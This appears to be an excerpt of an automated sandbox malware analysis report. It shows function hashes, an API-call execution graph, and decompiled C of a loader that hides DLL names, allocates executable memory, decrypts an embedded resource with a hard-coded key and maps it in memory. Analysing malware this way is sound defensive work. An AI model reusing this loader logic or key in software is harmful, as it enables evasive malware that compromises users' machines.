                                                                                                                      • Opcode Fuzzy Hash: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 03520F11 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.419571134.0000000003520000.00000010.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3520000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
                                                                                                                      • Instruction ID: 69c2cc473ba2ffe46571bfbe81b6e6a88fc87abe89913d0fe80f3f1d61f44521
                                                                                                                      • Opcode Fuzzy Hash: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 03520F21 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.419571134.0000000003520000.00000010.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3520000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
                                                                                                                      • Instruction ID: 69c2cc473ba2ffe46571bfbe81b6e6a88fc87abe89913d0fe80f3f1d61f44521
                                                                                                                      • Opcode Fuzzy Hash: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 03520FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.419571134.0000000003520000.00000010.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3520000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
                                                                                                                      • Instruction ID: 69c2cc473ba2ffe46571bfbe81b6e6a88fc87abe89913d0fe80f3f1d61f44521
                                                                                                                      • Opcode Fuzzy Hash: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 03520F91 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.419571134.0000000003520000.00000010.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3520000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
                                                                                                                      • Instruction ID: 69c2cc473ba2ffe46571bfbe81b6e6a88fc87abe89913d0fe80f3f1d61f44521
                                                                                                                      • Opcode Fuzzy Hash: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 03520F89 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.419571134.0000000003520000.00000010.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3520000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
                                                                                                                      • Instruction ID: 69c2cc473ba2ffe46571bfbe81b6e6a88fc87abe89913d0fe80f3f1d61f44521
                                                                                                                      • Opcode Fuzzy Hash: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Executed Functions

                                                                                                                      Function 000007FF00270A21 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.688009031.000007FF00270000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00270000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_7ff00270000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (x86)\AutoIt3\AutoItX
                                                                                                                      • API String ID: 0-1028575564
                                                                                                                      • Opcode ID: a26e667154bcef9657e5c534072332a7ec84af8cde794f08ab9567a575fc6bd2
                                                                                                                      • Instruction ID: a459c7075ea8e3cfbdc82a3251c522c10dce822885d38d14cde1d3fdf44b7087
                                                                                                                      • Opcode Fuzzy Hash: a26e667154bcef9657e5c534072332a7ec84af8cde794f08ab9567a575fc6bd2
                                                                                                                      • Instruction Fuzzy Hash: C6718820A0EBC64FE71357786C6A6A17FB09F57214F0A40EBD488CB0E3D948599AC762
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000007FF00270901 Relevance: .1, Instructions: 140COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.688009031.000007FF00270000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00270000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_7ff00270000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f4eeb6fb9dc550afe48a890d843d336be614189d08207a3f337cfb781d69539b
                                                                                                                      • Instruction ID: dd89b1f436cdebc65d2c80fda631844d9f3cbcfb1855e3e0f41256a5e5494c4d
                                                                                                                      • Opcode Fuzzy Hash: f4eeb6fb9dc550afe48a890d843d336be614189d08207a3f337cfb781d69539b
                                                                                                                      • Instruction Fuzzy Hash: A431402194E7C68FE75753785CA96A03FB0AF07210B0E00E7D088CF0A3E95C8D8AC762
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:16.1%
                                                                                                                      Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                      Signature Coverage:21.9%
                                                                                                                      Total number of Nodes:297
                                                                                                                      Total number of Limit Nodes:23
                                                                                                                      execution_graph 31846 10035042 TlsGetValue 31847 10035076 GetModuleHandleA 31846->31847 31848 10035055 31846->31848 31849 10035085 GetProcAddress 31847->31849 31850 1003509f 31847->31850 31848->31847 31851 1003505f TlsGetValue 31848->31851 31852 1003506e 31849->31852 31854 1003506a 31851->31854 31852->31850 31853 10035095 RtlEncodePointer 31852->31853 31853->31850 31854->31847 31854->31852 31855 10020c26 31858 10020c32 __EH_prolog3 31855->31858 31857 10020c80 31882 100206c8 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 31857->31882 31858->31857 31866 1002083b EnterCriticalSection 31858->31866 31880 100201f1 RaiseException __CxxThrowException@8 31858->31880 31881 1002094b TlsAlloc InitializeCriticalSection 31858->31881 31861 10020c8d 31863 10020c93 31861->31863 31864 10020ca6 ~_Task_impl 31861->31864 31883 100209ed 88 API calls 5 library calls 31863->31883 31871 1002085a 31866->31871 31867 10020916 _memset 31868 1002092a LeaveCriticalSection 31867->31868 31868->31858 31869 10020893 31884 10014460 31869->31884 31870 100208a8 GlobalHandle GlobalUnlock 31873 10014460 ctype 80 API calls 31870->31873 31871->31867 31871->31869 31871->31870 31875 100208c5 GlobalReAlloc 31873->31875 31876 100208cf 31875->31876 31877 100208f7 GlobalLock 31876->31877 31878 100208da GlobalHandle GlobalLock 31876->31878 31879 100208e8 LeaveCriticalSection 31876->31879 31877->31867 31878->31879 31879->31877 31881->31858 31882->31861 31883->31864 31885 10014477 ctype 31884->31885 31886 1001448c GlobalAlloc 31885->31886 31888 10013ba0 80 API calls _DebugHeapAllocator 31885->31888 31886->31876 31888->31886 31889 10030d06 31890 10030d12 31889->31890 31891 10030d0d 31889->31891 31895 10030c10 31890->31895 31907 1003906d GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 31891->31907 31894 10030d23 31897 10030c1c __setmbcp 31895->31897 31896 10030c69 31904 10030cb9 __setmbcp 31896->31904 31962 100125c0 31896->31962 31897->31896 31897->31904 31908 10030a37 31897->31908 31901 10030c99 31902 10030a37 __CRT_INIT@12 165 API calls 31901->31902 31901->31904 31902->31904 31903 100125c0 ___DllMainCRTStartup 146 API calls 31905 10030c90 31903->31905 31904->31894 31906 10030a37 __CRT_INIT@12 165 API calls 31905->31906 31906->31901 31907->31890 31909 10030b61 31908->31909 31910 10030a4a GetProcessHeap HeapAlloc 31908->31910 31911 10030b67 31909->31911 31912 10030b9c 31909->31912 31913 10030a6e GetVersionExA 31910->31913 31926 10030a67 31910->31926 31920 10030b86 31911->31920 31911->31926 32010 100310be 67 API calls _doexit 31911->32010 31916 10030ba1 31912->31916 31917 10030bfa 31912->31917 31914 10030a89 GetProcessHeap HeapFree 31913->31914 31915 10030a7e GetProcessHeap HeapFree 31913->31915 31918 10030ab5 31914->31918 31915->31926 31994 10035135 6 API calls __decode_pointer 31916->31994 31917->31926 32029 10035425 79 API calls 2 library calls 31917->32029 31984 10036624 HeapCreate 31918->31984 31920->31926 32011 100389ee 68 API calls __setmbcp 31920->32011 31921 10030ba6 31995 10035840 31921->31995 31926->31896 31927 10030aeb 31927->31926 31930 10030af4 31927->31930 32001 1003548e 78 API calls 7 library calls 31930->32001 31931 10030b90 32012 10035178 70 API calls 2 library calls 31931->32012 31932 10030bbe 32014 100350ae TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 31932->32014 31936 10030af9 __RTC_Initialize 31941 10030b0c GetCommandLineA 31936->31941 31954 10030afd 31936->31954 31937 10030b95 32013 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31937->32013 31938 10030bd0 31943 10030bd7 31938->31943 31944 10030bee 31938->31944 32003 10038d66 77 API calls 3 library calls 31941->32003 32015 100351b5 67 API calls 4 library calls 31943->32015 32016 1002fa69 31944->32016 31946 10030b1c 32004 100387ae 72 API calls 3 library calls 31946->32004 31949 10030bde GetCurrentThreadId 31949->31926 31950 10030b26 31951 10030b2a 31950->31951 32006 10038cad 111 API calls 3 library calls 31950->32006 32005 10035178 70 API calls 2 library calls 31951->32005 32002 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31954->32002 31955 10030b36 31956 10030b4a 31955->31956 32007 10038a3a 110 API calls 6 library calls 31955->32007 31961 10030b02 31956->31961 32009 100389ee 68 API calls __setmbcp 31956->32009 31959 10030b3f 31959->31956 32008 10030f4d 75 API calls 4 library calls 31959->32008 31961->31926 32055 10006a90 31962->32055 31965 1001265a 32089 1002fe65 105 API calls 6 library calls 31965->32089 31966 1001261c FindResourceW LoadResource SizeofResource 31969 10006a90 ___DllMainCRTStartup 67 API calls 31966->31969 31972 10012744 ___DllMainCRTStartup 31969->31972 31971 1001284d 31971->31901 31971->31903 31973 100127b7 VirtualAlloc 31972->31973 31974 1001279b VirtualAllocExNuma 31972->31974 31975 100127da 31973->31975 31974->31975 32060 1002fb00 31975->32060 31979 100127fa 32083 10002970 31979->32083 31981 10012810 ___DllMainCRTStartup 32086 100026a0 31981->32086 31983 10012664 32090 1002f81e 5 API calls __invoke_watson 31983->32090 31985 10036647 31984->31985 31986 10036644 31984->31986 32030 100365c9 67 API calls 2 library calls 31985->32030 31986->31927 31988 1003664c 31989 10036656 31988->31989 31990 1003667a 31988->31990 32031 10035aca HeapAlloc 31989->32031 31990->31927 31992 10036660 31992->31990 31993 10036665 HeapDestroy 31992->31993 31993->31986 31994->31921 31998 10035844 31995->31998 31997 10030bb2 31997->31926 31997->31932 31998->31997 31999 10035864 Sleep 31998->31999 32032 10030678 31998->32032 32000 10035879 31999->32000 32000->31997 32000->31998 32001->31936 32002->31961 32003->31946 32004->31950 32005->31954 32006->31955 32007->31959 32008->31956 32009->31951 32010->31920 32011->31931 32012->31937 32013->31926 32014->31938 32015->31949 32017 1002fa75 __setmbcp 32016->32017 32018 1002fab4 32017->32018 32019 1002faee _realloc __setmbcp 32017->32019 32051 10035a99 67 API calls 2 library calls 32017->32051 32018->32019 32020 1002fac9 HeapFree 32018->32020 32019->31961 32020->32019 32022 1002fadb 32020->32022 32054 100311f4 67 API calls __getptd_noexit 32022->32054 32023 1002fa8c ___sbh_find_block 32026 1002faa6 32023->32026 32052 10035b3d VirtualFree VirtualFree HeapFree __cftoe2_l 32023->32052 32025 1002fae0 GetLastError 32025->32019 32053 1002fabf LeaveCriticalSection _doexit 32026->32053 32029->31926 32030->31988 32031->31992 32033 10030684 __setmbcp 32032->32033 32034 1003069c 32033->32034 32044 100306bb _memset 32033->32044 32045 100311f4 67 API calls __getptd_noexit 32034->32045 32036 100306a1 32046 10037753 4 API calls 2 library calls 32036->32046 32038 1003072d RtlAllocateHeap 32038->32044 32041 100306b1 __setmbcp 32041->31998 32044->32038 32044->32041 32047 10035a99 67 API calls 2 library calls 32044->32047 32048 100362e6 5 API calls 2 library calls 32044->32048 32049 10030774 LeaveCriticalSection _doexit 32044->32049 32050 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32044->32050 32045->32036 32047->32044 32048->32044 32049->32044 32050->32044 32051->32023 32052->32026 32053->32018 32054->32025 32056 1002f9a6 _malloc 67 API calls 32055->32056 32057 10006aa1 32056->32057 32058 1002fa69 __setmbcp 67 API calls 32057->32058 32059 10006aad 32057->32059 32058->32059 32059->31965 32059->31966 32061 1002fb18 32060->32061 32062 1002fb3f __VEC_memcpy 32061->32062 32063 100127eb 32061->32063 32062->32063 32064 1002f9a6 32063->32064 32065 1002fa53 32064->32065 32076 1002f9b4 32064->32076 32098 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32065->32098 32067 1002fa59 32099 100311f4 67 API calls __getptd_noexit 32067->32099 32070 1002fa5f 32070->31979 32073 1002fa17 RtlAllocateHeap 32073->32076 32074 1002f9c9 32074->32076 32091 10036892 67 API calls 2 library calls 32074->32091 32092 100366f2 67 API calls 7 library calls 32074->32092 32093 10030e7b GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 32074->32093 32076->32073 32076->32074 32077 1002fa3e 32076->32077 32080 1002fa3c 32076->32080 32082 1002fa4a 32076->32082 32094 1002f957 67 API calls 4 library calls 32076->32094 32095 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32076->32095 32096 100311f4 67 API calls __getptd_noexit 32077->32096 32097 100311f4 67 API calls __getptd_noexit 32080->32097 32082->31979 32084 1002f9a6 _malloc 67 API calls 32083->32084 32085 10002990 32084->32085 32085->31981 32100 10002280 32086->32100 32089->31983 32090->31971 32091->32074 32092->32074 32094->32076 32095->32076 32096->32080 32097->32082 32098->32067 32099->32070 32137 10001990 32100->32137 32103 100022c3 SetLastError 32134 100022a9 32103->32134 32104 100022d5 32105 10001990 ___DllMainCRTStartup SetLastError 32104->32105 32106 100022ee 32105->32106 32107 10002310 SetLastError 32106->32107 32108 10002322 32106->32108 32106->32134 32107->32134 32109 10002331 SetLastError 32108->32109 32110 10002343 32108->32110 32109->32134 32111 1000234e SetLastError 32110->32111 32113 10002360 GetNativeSystemInfo 32110->32113 32111->32134 32114 10002414 SetLastError 32113->32114 32115 10002426 VirtualAlloc 32113->32115 32114->32134 32116 10002472 GetProcessHeap HeapAlloc 32115->32116 32117 10002447 VirtualAlloc 32115->32117 32119 100024ac 32116->32119 32120 1000248c VirtualFree SetLastError 32116->32120 32117->32116 32118 10002463 SetLastError 32117->32118 32118->32134 32121 10001990 ___DllMainCRTStartup SetLastError 32119->32121 32120->32134 32122 1000250e 32121->32122 32123 10002512 32122->32123 32124 1000251c VirtualAlloc 32122->32124 32175 10002840 VirtualFree VirtualFree GetProcessHeap HeapFree ___DllMainCRTStartup 32123->32175 32125 1000254b ___DllMainCRTStartup 32124->32125 32140 100019c0 32125->32140 32128 1000257f ___DllMainCRTStartup 32128->32123 32150 10001ff0 32128->32150 32132 100025e8 ___DllMainCRTStartup 32132->32123 32132->32134 32169 68e991 32132->32169 32134->31983 32135 1000264f SetLastError 32135->32123 32138 100019ab 32137->32138 32139 1000199f SetLastError 32137->32139 32138->32103 32138->32104 32138->32134 32139->32138 32144 100019f0 32140->32144 32141 10001a83 32142 10001990 ___DllMainCRTStartup SetLastError 32141->32142 32147 10001a9c 32142->32147 32143 10001a2c VirtualAlloc 32145 10001a50 32143->32145 32146 10001a57 ___DllMainCRTStartup 32143->32146 32144->32141 32144->32143 32149 10001aa0 ___DllMainCRTStartup 32144->32149 32145->32149 32146->32144 32148 10001aa4 VirtualAlloc 32147->32148 32147->32149 32148->32149 32149->32128 32151 10002029 IsBadReadPtr 32150->32151 32160 1000201f 32150->32160 32153 10002053 32151->32153 32151->32160 32154 10002085 SetLastError 32153->32154 32155 10002099 32153->32155 32153->32160 32154->32160 32176 100018b0 VirtualQuery VirtualFree VirtualAlloc ___DllMainCRTStartup 32155->32176 32157 100020b3 32158 100020bf SetLastError 32157->32158 32162 100020e9 32157->32162 32158->32160 32160->32123 32163 10001cb0 32160->32163 32161 100021f9 SetLastError 32161->32160 32162->32160 32162->32161 32165 10001cf8 ___DllMainCRTStartup 32163->32165 32164 10001e01 32166 10001b80 ___DllMainCRTStartup 2 API calls 32164->32166 32165->32164 32167 10001ddd 32165->32167 32177 10001b80 32165->32177 32166->32167 32167->32132 32170 68ea8d 32169->32170 32171 68ea62 32169->32171 32170->32134 32170->32135 32184 68f8fd 32171->32184 32175->32134 32176->32157 32178 10001b9c 32177->32178 32179 10001b92 32177->32179 32181 10001c04 VirtualProtect 32178->32181 32182 10001baa 32178->32182 32179->32165 32181->32179 32182->32179 32183 10001be2 VirtualFree 32182->32183 32183->32179 32196 68fde0 32184->32196 32185 68ffd1 32208 68ab87 32185->32208 32188 68ea75 32188->32170 32197 6893ed 32188->32197 32191 69dcf7 GetPEB 32191->32196 32194 68a8b0 GetPEB 32194->32196 32196->32185 32196->32188 32196->32191 32196->32194 32200 68b23c 32196->32200 32204 6946bb 32196->32204 32218 69da22 GetPEB 32196->32218 32219 6847ce GetPEB 32196->32219 32220 68f899 GetPEB 32196->32220 32221 684b61 32196->32221 32198 69aa30 GetPEB 32197->32198 32199 689456 ExitProcess 32198->32199 32199->32170 32201 68b254 32200->32201 32225 69aa30 32201->32225 32205 6946da 32204->32205 32206 69aa30 GetPEB 32205->32206 32207 694729 SHGetFolderPathW 32206->32207 32207->32196 32209 68abb0 32208->32209 32210 684b61 GetPEB 32209->32210 32211 68ad67 32210->32211 32233 687f5d 32211->32233 32213 68ad99 32214 68ada4 32213->32214 32237 691e67 GetPEB 32213->32237 32214->32188 32216 68adc4 32238 691e67 GetPEB 32216->32238 32218->32196 32219->32196 32220->32196 32222 684b74 32221->32222 32239 681ea7 32222->32239 32226 69ab1d 32225->32226 32227 68b2b8 lstrcmpiW 32225->32227 32231 690a0e GetPEB 32226->32231 32227->32196 32229 69ab33 32232 68cdcd GetPEB 32229->32232 32231->32229 32232->32227 32234 687f8e 32233->32234 32235 69aa30 GetPEB 32234->32235 32236 687fd4 CreateProcessW 32235->32236 32236->32213 32237->32216 32238->32214 32240 681ebc 32239->32240 32243 68702c 32240->32243 32244 687049 32243->32244 32245 69aa30 GetPEB 32244->32245 32246 681f4c 32245->32246 32246->32196

                                                                                                                      Executed Functions

                                                                                                                      Function 100125C0 Relevance: 45.7, APIs: 7, Strings: 19, Instructions: 165memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E100125C0(void* __ebx, void* __edi, void* __esi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				char _v40;
				void* _v44;
				void* _v48;
				long _v52;
				void* _v56;
				struct HRSRC__* _v60;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				short _v76;
				short _v78;
				short _v80;
				short _v82;
				short _v84;
				short _v86;
				char _v88;
				intOrPtr _v92;
				void* __ebp;
				signed int _t66;
				void* _t70;
				void* _t72;
				struct HRSRC__* _t74;
				void* _t78;
				intOrPtr _t92;
				void* _t93;
				void* _t95;
				intOrPtr _t104;
				signed int _t120;
				void* _t121;

				_t119 = __esi;
				_t118 = __edi;
				_t96 = __ebx;
				_t66 =  *0x100545cc; // 0xcd5fceb9
				_v20 = _t66 ^ _t120;
				_v92 = _a8;
				 *0x10055a80 = _a4;
				_t109 = _a8;
				 *0x10055a84 = _a8;
				 *0x10055a88 = _a12;
				_v8 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v12 = 0;
				_t70 = E10006A90(__eflags); // executed
				_t131 = _t70;
				if(_t70 != 0) {
					_push(0x10046758);
					E1002FE65(__ebx, _t109, __edi, __esi, __eflags);
					_t72 = 0;
				} else {
					 *0x100530b8 = 0;
					 *0x100530bc = 0;
					 *0x100530c0 = 0;
					 *0x100530c8 = 0;
					 *0x100530c4 = 0;
					 *0x100530cc = 0;
					_v60 = 0;
					_v56 = 0;
					_t74 = FindResourceW(_a4, 0x1705, L"DASHBOARD"); // executed
					_v60 = _t74;
					_v56 = LoadResource(_a4, _v60);
					_v52 = SizeofResource(_a4, _v60);
					_v88 = 0x6b;
					_v86 = 0x65;
					_v84 = 0x72;
					_v82 = 0x6e;
					_v80 = 0x65;
					_v78 = 0x6c;
					_v76 = 0x33;
					_v74 = 0x32;
					_v72 = 0x2e;
					_v70 = 0x64;
					_v68 = 0x6c;
					_v66 = 0x6c;
					_v64 = 0;
					_v40 = 0x6e;
					_v38 = 0x74;
					_v36 = 0x64;
					_v34 = 0x6c;
					_v32 = 0x6c;
					_v30 = 0x2e;
					_v28 = 0x64;
					_v26 = 0x6c;
					_v24 = 0x6c;
					_v22 = 0;
					_t78 = E10006A90(_t131); // executed
					if(_t78 == 0) {
						_t45 =  &_v88; // 0x6b
						_t95 = E100048E0(_t45);
						_t121 = _t121 + 4;
						_v44 = _t95;
					}
					_t47 =  &_v40; // 0x6e
					_v48 = E100048E0(_t47);
					 *0x10055a7c = E100053D0(_v44, 0x6c705b40);
					 *0x10055a78 = E100053D0(_v44, 0x531ff383);
					_t133 =  *0x10055a78;
					if( *0x10055a78 == 0) {
						__eflags = 0x2000;
						_v12 = VirtualAlloc(0, _v52, 0x00002000 -  *0x100530cc | 0x00001000, 0x40);
					} else {
						_t93 =  *0x10055a78(0xffffffff, 0, _v52, 0x3000, 0x40, 0); // executed
						_v12 = _t93;
					}
					E1002FB00(_t96, _t118, _t119, _v12, _v56, _v52);
					_t104 =  *0x100530b4; // 0x2795
					_v16 = E1002F9A6(_t96, _v56, _t118, _t119, _t104);
					E10002970(_t133, _v16, "6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0", 0x24);
					_t109 = _v16;
					E10003EE0(_v16, _v12, _v52);
					_t92 = E100026A0(0x10055a64, _v12, _v52); // executed
					 *0x10055a8c = _t92;
					_t72 = 1;
				}
				return E1002F81E(_t72, _t96, _v20 ^ _t120, _t109, _t118, _t119);
			}
















































                                                                                                                      0x100125c0
                                                                                                                      0x100125c0
                                                                                                                      0x100125c0
                                                                                                                      0x100125c6
                                                                                                                      0x100125cd
                                                                                                                      0x100125d3
                                                                                                                      0x100125d9
                                                                                                                      0x100125df
                                                                                                                      0x100125e2
                                                                                                                      0x100125eb
                                                                                                                      0x100125f0
                                                                                                                      0x100125f7
                                                                                                                      0x100125fe
                                                                                                                      0x10012605
                                                                                                                      0x1001260c
                                                                                                                      0x10012613
                                                                                                                      0x10012618
                                                                                                                      0x1001261a
                                                                                                                      0x1001265a
                                                                                                                      0x1001265f
                                                                                                                      0x10012667
                                                                                                                      0x1001261c
                                                                                                                      0x1001261c
                                                                                                                      0x10012626
                                                                                                                      0x10012630
                                                                                                                      0x1001263a
                                                                                                                      0x10012644
                                                                                                                      0x1001264e
                                                                                                                      0x1001266e
                                                                                                                      0x10012675
                                                                                                                      0x1001268a
                                                                                                                      0x10012690
                                                                                                                      0x100126a1
                                                                                                                      0x100126b2
                                                                                                                      0x100126b5
                                                                                                                      0x100126bb
                                                                                                                      0x100126c1
                                                                                                                      0x100126c7
                                                                                                                      0x100126cd
                                                                                                                      0x100126d3
                                                                                                                      0x100126d9
                                                                                                                      0x100126df
                                                                                                                      0x100126e5
                                                                                                                      0x100126eb
                                                                                                                      0x100126f1
                                                                                                                      0x100126f7
                                                                                                                      0x100126fd
                                                                                                                      0x10012703
                                                                                                                      0x10012709
                                                                                                                      0x1001270f
                                                                                                                      0x10012715
                                                                                                                      0x1001271b
                                                                                                                      0x10012721
                                                                                                                      0x10012727
                                                                                                                      0x1001272d
                                                                                                                      0x10012733
                                                                                                                      0x10012739
                                                                                                                      0x1001273f
                                                                                                                      0x10012746
                                                                                                                      0x10012748
                                                                                                                      0x1001274c
                                                                                                                      0x10012751
                                                                                                                      0x10012754
                                                                                                                      0x10012754
                                                                                                                      0x10012757
                                                                                                                      0x10012763
                                                                                                                      0x10012777
                                                                                                                      0x1001278d
                                                                                                                      0x10012792
                                                                                                                      0x10012799
                                                                                                                      0x100127c4
                                                                                                                      0x100127d7
                                                                                                                      0x1001279b
                                                                                                                      0x100127ac
                                                                                                                      0x100127b2
                                                                                                                      0x100127b2
                                                                                                                      0x100127e6
                                                                                                                      0x100127ee
                                                                                                                      0x100127fd
                                                                                                                      0x1001280b
                                                                                                                      0x1001281b
                                                                                                                      0x1001281f
                                                                                                                      0x10012834
                                                                                                                      0x10012839
                                                                                                                      0x1001283e
                                                                                                                      0x1001283e
                                                                                                                      0x10012850

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                      • _printf.LIBCMT ref: 1001265F
                                                                                                                      • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                      • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
                                                                                                                      • _malloc.LIBCMT ref: 100127F5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                      • String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
                                                                                                                      • API String ID: 572389289-2839844625
                                                                                                                      • Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
